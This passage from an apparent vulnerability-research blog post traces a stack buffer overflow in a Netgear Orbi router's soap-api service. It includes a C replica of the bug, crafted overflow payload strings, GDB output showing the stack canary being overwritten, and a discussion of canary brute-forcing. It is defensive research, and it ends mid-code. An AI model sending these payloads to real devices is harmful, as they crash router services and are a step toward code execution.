<p>As hinted at above, a few weeks later I did eventually revisit the question of whether the buffer overflow could be triggered, and found a way to do it! In fact, it happened while I was writing the first part of this post, which I was basically going to end with the section before this one, saying there was no way around the null dereference. While reading through my notes and trying to clean everything up and make sure it all made sense, I noticed I had made some mistakes and incorrect assumptions, mainly about the constraints and the behavior of <code class="language-plaintext highlighter-rouge">sscanf()</code>. I’ve corrected those mistakes in the code breakdown above in the interest of clarity. Anyway, I updated my mental model of the bug.</p>

<p>With a new understanding of the constraints, I went back to the code and did some more testing to see if it would be possible to overflow <code class="language-plaintext highlighter-rouge">method_response_buf</code> while avoiding the NULL dereference caused by failing the check for <code class="language-plaintext highlighter-rouge">"service:"</code>. Assuming this can be done successfully, the program should then crash due to failing a stack canary check. Stack canary protection (as well as PIE and RELRO) was enabled between firmware versions 2.5.1.16 and 2.7.33.</p>

<p>From the GPL archive (<code class="language-plaintext highlighter-rouge">soap-api</code> is part of the <code class="language-plaintext highlighter-rouge">net-cgi</code> package):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">.</span><span class="o">/</span><span class="n">package</span><span class="o">/</span><span class="n">dni</span><span class="o">/</span><span class="n">net</span><span class="o">-</span><span class="n">cgi</span><span class="o">/</span><span class="n">Makefile</span><span class="o">:</span><span class="n">TARGET_CFLAGS</span> <span class="o">+=</span> <span class="o">-</span><span class="n">Werror</span> <span class="o">-</span><span class="n">Wl</span><span class="p">,</span><span class="o">-</span><span class="n">z</span><span class="p">,</span><span class="n">now</span> <span class="o">-</span><span class="n">Wl</span><span class="p">,</span><span class="o">-</span><span class="n">z</span><span class="p">,</span><span class="n">relro</span> <span class="o">-</span><span class="n">fPIE</span> <span class="o">-</span><span class="n">pie</span> <span class="o">-</span><span class="n">fstack</span><span class="o">-</span><span class="n">protector</span>
</code></pre></div></div>

<h3 id="local-testing">local testing</h3>

<p>In order to get a better understanding of the actual behavior of the application with a better debugging environment to work in, I wrote the following code to simulate the same behavior on my own system.</p>

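<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span>
<span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span>
<span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span>

<span class="kt">int</span> <span class="nf">replica</span> <span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">resp</span><span class="p">)</span> <span class="p">{</span>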
	<span class="c1">// THE ORDER OF VARIABLES IN MEMORY IS IMPORTANT TO REPRODUCE ACCURATELY (or at least close to accurate)</span>
	<span class="kt">int</span> <span class="n">content_len</span><span class="p">;</span>
	<span class="kt">char</span><span class="o">*</span> <span class="n">jwt</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">var2</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">var3</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">var4</span><span class="p">;</span>
	<span class="kt">char</span> <span class="n">method_buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
	<span class="kt">char</span> <span class="n">action_buf</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span>
	<span class="kt">char</span> <span class="n">combined_action_method</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">undef1</span><span class="p">;</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">undef2</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">stack_check_val</span><span class="p">;</span>

	<span class="n">printf</span><span class="p">(</span><span class="s">"resp: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">resp</span><span class="p">);</span>

	<span class="c1">// fake stack canary</span>
	<span class="n">stack_check_val</span> <span class="o">=</span> <span class="mh">0x313373</span><span class="p">;</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] stack check start: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">stack_check_val</span><span class="p">);</span>

	<span class="c1">// null the buffers</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">method_buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">64</span><span class="p">);</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">action_buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">combined_action_method</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">128</span><span class="p">);</span>

	<span class="c1">// call sscanf - 1: parse the Method portion from the xml blob in resp</span>
	<span class="c1">// and save it to method buf (format is '&lt;m:METHODResponse*'). there is a buffer overflow</span>
	<span class="c1">// here if the parsed string is greater than 64 bytes</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] sscanf call 1: parse method portion from resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">sscanf</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span> <span class="s">"&lt;m:%sResponse%*s"</span><span class="p">,</span> <span class="n">method_buf</span><span class="p">);</span>

	<span class="c1">// this would check to confirm that the expected pattern/str was parsed (should still</span>
	<span class="c1">// contain the 'Response' portion - a long enough method will cause this to be truncated and we'll</span>
	<span class="c1">// fail this check.</span>
	<span class="n">var2</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">method_buf</span><span class="p">,</span> <span class="s">"Response"</span><span class="p">);</span>
	<span class="c1">// but it doesn't really matter: the result is only used to decide whether to null-terminate method_buf at 'Response'</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">var2</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"[+] found 'Response' in method_buf, NULLED</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="o">*</span><span class="n">var2</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// ========= Second call to sscanf() and NULL check fail ===========</span>
	<span class="c1">// search for service string in resp, no NULL check</span>
	<span class="c1">// a long enough METHOD would result in this being truncated, causing strstr</span>
	<span class="c1">// to return a NULL pointer</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] strstr call 1: check for 'service:' in resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">var3</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span> <span class="s">"service:"</span><span class="p">);</span>
	<span class="c1">// DEBUG -- show when we fail this check</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">var3</span> <span class="o">==</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\033</span><span class="s">[0;31m[!] didn't find 'service:', expect a NULL ptr deref</span><span class="se">\n\033</span><span class="s">[0m"</span><span class="p">);</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"resp: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">resp</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] sscanf call 2: parse ACTION portion from resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">sscanf</span><span class="p">(</span><span class="n">var3</span><span class="p">,</span> <span class="s">"service:%[^:]"</span><span class="p">,</span> <span class="n">action_buf</span><span class="p">);</span>

	<span class="c1">// check for &lt;ResponseCode&gt; in resp</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] strstr call 2: check for '&lt;ResponseCode&gt;' in resp</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">var3</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">strstr</span><span class="p">(</span><span class="n">resp</span><span class="p">,</span> <span class="s">"&lt;ResponseCode&gt;"</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">var3</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// if its there, parse some stuff from it (not important right now)</span>
		<span class="n">printf</span><span class="p">(</span><span class="s">"[+] found &lt;ResponseCode&gt;, passed check</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="n">undef1</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// check if the stack check int was overwritten</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] stack check end: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">stack_check_val</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
	<span class="c1">// args to pass to target func (replicating original)</span>
	<span class="kt">FILE</span> <span class="o">*</span><span class="n">streams</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="c1">// this will hold the payload (i.e. the Method portion we would submit)</span>
	<span class="c1">// read from env to make testing easier</span>
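	<span class="kt">char</span> <span class="o">*</span><span class="n">payload</span> <span class="o">=</span> <span class="n">getenv</span><span class="p">(</span><span class="s">"PAYLOAD"</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">payload</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// bail out early instead of passing NULL to strlen()</span>
		<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"[!] PAYLOAD is not set</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
	<span class="p">}</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] payload length: %zu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">payload</span><span class="p">));</span>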

	<span class="c1">// construct the response content the same way the server does in SendSoapRespCode()</span>
	<span class="kt">char</span> <span class="n">resp_b</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
	<span class="n">memset</span><span class="p">(</span><span class="n">resp_b</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
  <span class="c1">// this is the fmt string the calling function uses to construct resp</span>
	<span class="kt">char</span> <span class="o">*</span><span class="n">resp_fmt</span> <span class="o">=</span> <span class="s">"&lt;m:%sResponse xmlns:m=</span><span class="se">\"</span><span class="s">urn:NETGEAR-ROUTER:service:%s:1</span><span class="se">\"</span><span class="s">&gt;&lt;/m:%sResponse&gt;</span><span class="se">\r\n</span><span class="s">&lt;ResponseCode&gt;%03d&lt;/ResponseCode&gt;</span><span class="se">\r\n</span><span class="s">"</span><span class="p">;</span>
	<span class="n">snprintf</span><span class="p">(</span><span class="n">resp_b</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="n">resp_fmt</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="s">"ConfigSync"</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="mi">404</span><span class="p">);</span>

	<span class="c1">// call the target function with the payload</span>
	<span class="n">printf</span><span class="p">(</span><span class="s">"[+] calling target function...</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">replica</span><span class="p">(</span><span class="n">streams</span><span class="p">,</span> <span class="n">resp_b</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I experimented with various payloads using this code and this is when I made a new discovery: different payloads would cause <code class="language-plaintext highlighter-rouge">resp</code> to be corrupted in different ways, which would sometimes result in <code class="language-plaintext highlighter-rouge">resp</code> containing the <em>‘service:’</em> string before the first call to <code class="language-plaintext highlighter-rouge">sscanf()</code> but not after. The output below shows this happening with a payload that one would assume would definitely pass the string check:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-&gt; % ./replica2
<span class="o">[</span>+] payload length: 130
<span class="o">[</span>+] calling target <span class="k">function</span>...

resp: &lt;m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response xmlns:m<span class="o">=</span><span class="s2">"urn:NETGEAR-ROUTER:service:ConfigSync:1"</span><span class="o">&gt;</span>&lt;/m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAA
AAAAAAAAservice:service:service:service:service:service:service:service:service:service:Response&gt;
&lt;ResponseCode&gt;404&lt;/ResponseCode&gt;

<span class="o">[</span>+] stack check start: 0x313373
<span class="o">[</span>+] sscanf call 1: parse method portion from resp
<span class="o">[</span>+] found <span class="s1">'Response'</span> <span class="k">in </span>method_buf, NULLED
<span class="o">[</span>+] strstr call 1: check <span class="k">for</span> <span class="s1">'service:'</span> <span class="k">in </span>resp
<span class="o">[!]</span> didnt find <span class="s1">'service:'</span>, expect a NULL ptr deref
resp: e:
<span class="o">[</span>+] sscanf call 2: parse ACTION portion from resp
<span class="o">[</span>1]    221258 segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>  ./replica2
</code></pre></div></div>
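
<p>One way to reason about output like this is to work out how many bytes the first <code class="language-plaintext highlighter-rouge">sscanf()</code> stores. The sketch below assumes the replica's <code class="language-plaintext highlighter-rouge">"&lt;m:%s..."</code> format, where an unbounded <code class="language-plaintext highlighter-rouge">%s</code> copies everything up to the first whitespace character. The helper names are hypothetical and the 64-byte size comes from <code class="language-plaintext highlighter-rouge">method_buf</code> in the replica.</p>

```c
#include <stddef.h>
#include <string.h>

#define METHOD_BUF_SIZE 64  /* size of method_buf in the replica */

/*
 * Number of bytes an unbounded "<m:%s" conversion would store for `resp`,
 * including the terminating NUL. Returns 0 if `resp` does not start with
 * "<m:" or if there is no token for %s to match.
 */
size_t method_bytes_written(const char *resp)
{
    static const char ws[] = " \t\n\v\f\r";

    if (strncmp(resp, "<m:", 3) != 0)
        return 0;

    const char *p = resp + 3;
    p += strspn(p, ws);             /* %s skips leading whitespace */
    size_t len = strcspn(p, ws);    /* then copies up to the next whitespace */
    return len == 0 ? 0 : len + 1;
}

/* Returns 1 if the write would run past the end of a 64-byte buffer. */
int overflows_method_buf(const char *resp)
{
    return method_bytes_written(resp) > METHOD_BUF_SIZE;
}
```

<p>For a 130-byte payload the token is the payload plus the trailing <code class="language-plaintext highlighter-rouge">Response</code>, so 139 bytes land in a 64-byte buffer and whatever sits after it on the stack is overwritten. Which neighbours get hit depends on the stack layout the compiler chooses, so this helper only tells you how far the write runs, not what it clobbers.</p>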

<p>After some trial and error I eventually found a payload that would successfully overflow <code class="language-plaintext highlighter-rouge">method_buf</code>, avoid the null deref, and overwrite the simulated stack canary:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-&gt; % ./replica2
<span class="o">[</span>+] payload length: 2450
<span class="o">[</span>+] calling target <span class="k">function</span>...

resp: &lt;m:AAservice:AAAAAAAservice:AAAAAAAAAAAAAAAAAAAAAAAAAservice:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:service:se

<span class="o">[</span>+] stack check start: 0x313373
<span class="o">[</span>+] sscanf call 1: parse method portion from resp
<span class="o">[</span>+] strstr call 1: check <span class="k">for</span> <span class="s1">'service:'</span> <span class="k">in </span>resp
<span class="o">[</span>+] sscanf call 2: parse ACTION portion from resp
<span class="o">[</span>+] strstr call 2: check <span class="k">for</span> <span class="s1">'&lt;ResponseCode&gt;'</span> <span class="k">in </span>resp
<span class="o">[</span>+] stack check end: 0x63697672
<span class="o">[</span>1]    221814 segmentation fault <span class="o">(</span>core dumped<span class="o">)</span>  ./replica2
</code></pre></div></div>

<p>Nice!</p>
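
<p>A quick way to sanity check where an overwritten value came from is to print its bytes in memory order. The helper below is a small sketch with a hypothetical name, and it assumes a little-endian target, so the least significant byte is the first one in memory.</p>

```c
#include <stdint.h>

/*
 * Writes the four bytes of `v` to `out` in little-endian memory order,
 * replacing non-printable bytes with '.', and NUL-terminates the result.
 */
void le32_to_ascii(uint32_t v, char out[5])
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((v >> (8 * i)) & 0xff);
        out[i] = (b >= 0x20 && b <= 0x7e) ? (char)b : '.';
    }
    out[4] = '\0';
}
```

<p>Feeding it <code class="language-plaintext highlighter-rouge">0x63697672</code> gives <code class="language-plaintext highlighter-rouge">rvic</code>, the middle of one of the repeated <code class="language-plaintext highlighter-rouge">service:</code> strings in the payload, which confirms the fake canary was overwritten with payload data.</p>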

<h3 id="now-against-the-device">now, against the device</h3>

<p>With a new payload in hand, I moved back to testing this against the actual device while attached with GDB. After a bit of tweaking to account for differences in memory layout, I eventually noticed that this payload resulted in the process receiving a SIGKILL and dying rather than triggering the SIGSEGV caused by the null dereference.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaa"
</code></pre></div></div>

<p>I modified the GDB script I had been using to break on <code class="language-plaintext highlighter-rouge">__stack_chk_fail()</code> instead of  <code class="language-plaintext highlighter-rouge">sscanf()</code> to confirm and saw this in the output:</p>

<p><img src="/assets/images/orbi-stackfail.png" alt="stackfail" /></p>

<p>Finally! The null dereference had been avoided and it was the stack canary check failing that was causing the application to die. After all the trouble I’d gone through digging into this bug, that felt <strong><em>goooooood</em></strong>.</p>

<p>I spent a little more time playing with the payload until I found the exact place where the canary overwrite actually happened and trimmed it down to this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"x:x:service:ConfigSync:5#AAservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:AAAAAAAservice:aaaabaaservice:**BBBBBB**"
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 2.1 "soap-api" hit Breakpoint 3, 0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb69aee40 in __stack_chk_fail () from /lib/libc.so.1
r0             0x0	0
r1             0xb6f01b65	3069188965
r2             **0x42424242**	1111638594
r3             0x5719b01e	1461301278
r4             0x0	0
r5             0xb6a39214	3064173076
r6             0xb6f2bb80	3069361024
r7             0xbe88e4cc	3196642508
r8             0xbe88e40c	3196642316
r9             0xbe88e3cc	3196642252
r10            0xbe88e3a4	3196642212
r11            0xb6f316fc	3069384444
r12            0xb6f2bc6c	3069361260
sp             0xbe88e388	0xbe88e388
lr             0xb6eb2aa8	-1226102104
pc             0xb69aee40	0xb69aee40 &lt;__stack_chk_fail&gt;
cpsr           0x80000010	-2147483632
0x0:	&lt;error: Cannot access memory at address 0x0&gt;
0xb6f01b65:	""
0x42424242:	&lt;error: Cannot access memory at address **0x42424242**&gt;
0x5719b01e:	&lt;error: Cannot access memory at address 0x5719b01e&gt;
</code></pre></div></div>

<h2 id="stack-canary-bypass-question-mark">stack canary bypass, question mark?</h2>

<p>So, after weeks (months?) of poking at this bug on and off and eventually giving up, I’d come back and managed to get back to square one: a buffer overflow that was triggering the stack check fail and crashing the application. Naturally, the next step was to explore ways to get past the stack canary and see if I could get a working exploit going. I’d only ever dealt with stack canaries in toy examples, so this would be my first time trying against a real target, and having to do it with the limited debugging environment only made things more difficult.</p>

<h3 id="a-primer-on-ssp">a primer on SSP</h3>

<p>The Stack Smashing Protector (SSP) is a compiler feature specifically designed to detect stack-based buffer overflows and abort the program if one is detected, mitigating the potential effects of the memory corruption. There are various implementations of this feature, but they all follow a similar design: the compiler inserts code that copies a value from a global variable into a local variable (the canary) at the start of a function, along with code to check that this value still matches the value saved in the global variable at the end of the function, before it returns. If the values do not match, the program is immediately terminated to prevent further execution that could result in undefined behavior. The canary is usually inserted into the stack in such a way that it sits immediately before the return address at the edge of the current function’s stack frame. This means a buffer overflow that has successfully corrupted the return address would also have corrupted the canary value, so the canary check fails and the program is aborted before the function returns and attempts to use the corrupted return address.</p>

<p>For GCC’s <code class="language-plaintext highlighter-rouge">-fstack-protector</code>, for example:</p>

<blockquote>
  <p><em>This is done by adding a guard variable to functions with vulnerable objects. This includes functions that call alloca, and functions with buffers larger than 8 bytes. The guards are initialized when a function is entered and then checked when the function exits. If a guard check fails, an error message is printed and the program exits.</em></p>

</blockquote>

<p>It’s important to note one thing: this protection does not <em>prevent</em> overflows from happening. It’s only meant to detect them and mitigate classic stack overflow exploitation. This means that any code that executes after the overflow has occurred but before the end of the function, when the canary is checked, could be affected by the memory corruption. Modern implementations do a few things to mitigate this as well, such as reordering variable declarations to move non-buffer variables ‘above’ overflow-able buffers so that they cannot be (easily) corrupted, and placing all buffers together in memory right before the canary and return address to limit the scope of data that can be corrupted and increase the likelihood of overflows overwriting the canary value.</p>
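
<p>To make the layout and the check concrete, here is a minimal Python model of a single protected function call. It is only a sketch under stated assumptions: the 16-byte buffer, the <code class="language-plaintext highlighter-rouge">RETN</code> placeholder return address, and the function name are all made up for illustration, and real compilers emit this logic as machine code in the function prologue and epilogue.</p>

```python
import os

BUF_SIZE = 16      # hypothetical buffer size, chosen for illustration
CANARY_SIZE = 4    # 32-bit canary, as on a 32-bit ARM target


def call_with_input(data: bytes, guard: bytes) -> str:
    """Model one function call: prologue, unchecked copy, epilogue check."""
    # Frame layout (low to high addresses): buffer | canary | return address
    saved_return = b"RETN"
    frame = bytearray(BUF_SIZE) + bytearray(guard) + bytearray(saved_return)

    # Unchecked copy: nothing stops the write from running past the buffer.
    n = min(len(data), len(frame))
    frame[:n] = data[:n]

    # Epilogue: compare the frame's canary copy against the global guard.
    canary = bytes(frame[BUF_SIZE:BUF_SIZE + CANARY_SIZE])
    if canary != guard:
        return "abort: __stack_chk_fail"
    return "return to " + bytes(frame[BUF_SIZE + CANARY_SIZE:]).decode()


guard = os.urandom(CANARY_SIZE)
print(call_with_input(b"A" * BUF_SIZE, guard))        # input fits the buffer
print(call_with_input(b"A" * (BUF_SIZE + 8), guard))  # overflow reaches the canary first
```

<p>Note that in this model the overflow itself always succeeds; the only thing the canary changes is what happens when the function tries to return. An attacker who knows the guard value can write it back in place and still control the return address.</p>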

<p>Another important point is that the canary value is set once when the process starts, so it remains the same for the entire lifetime of the application, including in any children it forks. New processes started via the shell or <code class="language-plaintext highlighter-rouge">execve()</code> will have unique canaries.</p>

<p>I took a look at <code class="language-plaintext highlighter-rouge">arch/arm/include/asm/stackprotector.h</code> in the sources for the kernel used by the device (custom fork of 3.14.77) and found this code, showing that the canary is initialized by XORing random bytes against the value of <code class="language-plaintext highlighter-rouge">LINUX_VERSION_CODE</code> on ARM architectures:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">__always_inline</span> <span class="kt">void</span> <span class="nf">boot_init_stack_canary</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">canary</span><span class="p">;</span>

	<span class="cm">/* Try to get a semi random initial value. */</span>
	<span class="n">get_random_bytes</span><span class="p">(</span><span class="o">&amp;</span><span class="n">canary</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">canary</span><span class="p">));</span>
	<span class="n">canary</span> <span class="o">^=</span> <span class="n">LINUX_VERSION_CODE</span><span class="p">;</span>

	<span class="n">current</span><span class="o">-&gt;</span><span class="n">stack_canary</span> <span class="o">=</span> <span class="n">canary</span><span class="p">;</span>
	<span class="n">__stack_chk_guard</span> <span class="o">=</span> <span class="n">current</span><span class="o">-&gt;</span><span class="n">stack_canary</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
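
<p>For a sense of what that XOR actually does, the sketch below mirrors the arithmetic in Python. It assumes the <code class="language-plaintext highlighter-rouge">KERNEL_VERSION(a, b, c)</code> encoding used by kernels of this era, <code class="language-plaintext highlighter-rouge">(a &lt;&lt; 16) + (b &lt;&lt; 8) + c</code>, and uses <code class="language-plaintext highlighter-rouge">os.urandom()</code> as a stand-in for <code class="language-plaintext highlighter-rouge">get_random_bytes()</code>; the helper names are mine.</p>

```python
import os


def kernel_version(a: int, b: int, c: int) -> int:
    """Mirror of the KERNEL_VERSION(a, b, c) macro (assumed classic encoding)."""
    return (a << 16) + (b << 8) + c


# The device runs a fork of 3.14.77.
LINUX_VERSION_CODE = kernel_version(3, 14, 77)


def init_canary() -> int:
    """Model of boot_init_stack_canary() on a 32-bit target."""
    canary = int.from_bytes(os.urandom(4), "little")  # stand-in for get_random_bytes()
    return canary ^ LINUX_VERSION_CODE


print(hex(LINUX_VERSION_CODE))  # 0x30e4d
print(hex(init_canary()))       # different on every run
```

<p>Since XOR with a constant is a one-to-one mapping, mixing in the version code neither adds nor removes randomness; the result is only as unpredictable as the random bytes going in.</p>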

<h3 id="bruteforcing-i-guessnot">bruteforcing? I guess…not</h3>

<p>Generally speaking, there are two ways of going about bypassing the canary check:</p>

<ul>
  <li>Use a separate memory leak vulnerability to leak the canary value so that it can be correctly overwritten</li>
  <li>Bruteforce the canary byte-by-byte (only works under certain conditions)</li>
</ul>

<p>Since I hadn’t found any ways to leak memory, the only real option I had was bruteforcing. There’s a specific bruteforcing technique that can greatly reduce the total number of attempts needed to determine the canary value by guessing one byte at a time, using the lack of a crash as an oracle to determine when the correct byte has been guessed and repeating this for each byte of the canary. As mentioned above, this only works under certain conditions: the program must keep the same canary between payloads (i.e. fork-and-accept servers) and the code that reads the payload must not append a NULL byte (e.g. <code class="language-plaintext highlighter-rouge">read</code> / <code class="language-plaintext highlighter-rouge">recv</code>). I found a few good resources that helped me better understand this concept such as this <a href="https://www.youtube.com/watch?v=01EX0mjya5A">LiveOverflow video</a> and this <a href="https://ctf101.org/binary-exploitation/stack-canaries/">CTF guide</a> (screenshot below taken from here).</p>

<p><img src="/assets/images/orbi-brute.png" alt="bruteforcing" /></p>

<p>Seems easy enough, right? I went back to the device and determined the minimum length to overflow the buffer and trigger the stack check fail was 209 characters. After sending only a couple of requests and watching the values in the debugger I quickly realized this wasn’t going to work at all.</p>

<p>The output below shows the debugger breaking at the start of <code class="language-plaintext highlighter-rouge">__stack_chk_fail()</code> with <code class="language-plaintext highlighter-rouge">r2</code> containing the local copy of the stack canary that has been overwritten by a single byte and <code class="language-plaintext highlighter-rouge">r3</code> containing the original. As you can see, the byte that was written was <code class="language-plaintext highlighter-rouge">00</code> (NULL): the function that reads the payload into the buffer (<code class="language-plaintext highlighter-rouge">sscanf()</code>) appends a NULL. So, one of the conditions for this to be viable is already out.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 2.1 "soap-api" hit Breakpoint 2, 0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
#0  0xb698be40 in __stack_chk_fail () from /lib/libc.so.1
No symbol table info available.
Backtrace stopped: Cannot access memory at address 0x4f532f34
Stack level 0, frame at 0xbecd34c8:
 pc = 0xb698be40 in __stack_chk_fail; saved pc = 0xb6e8faa8
 Outermost frame: Cannot access memory at address 0x4f532f34
 Arglist at 0xbecd34c8, args:
 Locals at 0xbecd34c8, Previous frame's sp is 0xbecd34c8
r0             0x0      0
r1             0xb6edeb65       3069045605
**r2             0xb710d200       3071332864**
r3             0xb710d29e       3071333022
r4             0x0      0
r5             0xb6a16214       3064029716
r6             0xb6f08b80       3069217664
r7             0xbecd360c       3201119756
r8             0xbecd354c       3201119564
r9             0xbecd350c       3201119500
r10            0xbecd34e4       3201119460
r11            0xb6f0e6fc       3069241084
r12            0xb6f08c6c       3069217900
sp             0xbecd34c8       0xbecd34c8
lr             0xb6e8faa8       -1226245464
pc             0xb698be40       0xb698be40 &lt;__stack_chk_fail&gt;
cpsr           0x80000010       -2147483632
</code></pre></div></div>
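
<p>The register values above can be reproduced with a short Python sketch that models a string copy spilling into a little-endian 32-bit canary. The helper name is mine, and the model assumes the copy always writes a trailing NUL right after the last payload byte.</p>

```python
import struct

ORIGINAL = 0xB710D29E  # r3 in the output above: the real canary


def after_overflow(canary: int, written: bytes) -> int:
    """Spill `written` plus a trailing NUL into the canary and return the result."""
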